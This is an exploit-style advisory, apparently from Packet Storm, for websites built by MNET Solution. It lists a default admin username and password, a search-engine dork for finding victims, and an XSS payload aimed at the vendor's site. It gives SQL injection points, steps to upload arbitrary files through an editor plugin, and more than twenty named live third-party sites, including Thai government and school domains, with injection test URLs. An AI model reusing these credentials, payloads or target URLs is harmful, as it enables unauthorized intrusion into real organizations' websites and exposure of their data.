Sites designed by MNET Solution suffer from cross site scripting, html injection, remote shell upload, and remote SQL injection vulnerabilities. Note that this advisory has site-specific information.
a6d883c3385bd5eb431bf7293537ba2f#Title : MNET Solution Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 10/19/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://mnet.co.th
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : XSS, SQL Injection, HTML Injection, Arbitrary File Upload
#Dork : inurl:webboard.php?option=answers
Default Admin Password
http://site-target/siteadmin/
Username : superadmin
Password : jocho
====================================================================================================
Cross Site Scripting
http://site-target/[PATH]/subindex.php?page=search&kword=[XSS]
Example at Web Vendor
http://mnet.co.th/2012/th/main/subindex.php?page=search&kword=<script>alert('DevilScreaM')</script>
====================================================================================================
SQL Injection Vulnerability
Vulnerable at 'webboard.php'
http://site-target/[PATH]/webboard.php?option=answers&qNo=[SQLI]
====================================================================================================
HTML Injection
Register to WebBoard, after Register, Create New Post
Go to http://site-target/[PATH]/webboard.php?#post
#NOTE
Register Page : http://site-target/subindex.php?page=member&task=new
====================================================================================================
Arbitrary File Upload
1. Login to Page Admin
2. After Login, go to http://site-target/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
3. Click Upload, And Upload Your HTML
4. Result Upload at
http://site-target/upfile/[YOURFILE].html
http://site-target/images/[YOURFILE].html
======================================================================================================
Example Target
http://tarbiah.ac.th/main/webboard.php?option=answers&qNo=20'
http://pasayyawo.go.th/main/webboard.php?option=answers&qNo=9'
http://anwarulislam.ac.th/main/webboard.php?option=answers&qNo=10'
http://pujud.go.th/main/webboard.php?option=answers&qNo=20'
http://npm.ac.th/en/webboard.php?option=answers&qNo=3'
http://klongchanak.go.th/2011/main/webboard.php?option=answers&qNo=20'
http://alfatihah.ac.th/main/webboard.php?option=answers&qNo=20'
http://halal.or.th/th/main/webboard.php?option=answers&qNo=20'
http://kpgt.co.th/en/main/webboard.php?option=answers&qNo=20'
http://startec.co.th/main/webboard.php?option=answers&qNo=13'
http://worldwidestudy.co.th/main/webboard.php?option=answers&qNo=4'
http://mrhalalfood.co.th/th/main/webboard.php?option=answers&qNo=1'
http://royalthaitour.com/ar/main/webboard.php?option=answers&qNo=2'
http://prosperfilms.com/en/main/webboard.php?option=answers&qNo=8'
http://halalscience.org/en/main/webboard.php?option=answers&qNo=2'
http://satelliteguidemag.com/main/webboard.php?option=answers&qNo=13'
http://jintakanitlanna.com/main/webboard.php?option=answers&qNo=63'
http://muslimchonburi.com/2011/main/webboard.php?option=answers&qNo=23'
http://fulfilacademy.com/main/webboard.php?option=answers&qNo=43'
http://st-arabian.com/main/webboard.php?option=answers&qNo=43'
http://thaipaki.com/main/webboard.php?option=answers&qNo=47'
http://ben-socks.com/th/main/webboard.php?option=answers&qNo=23'
© 2015 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!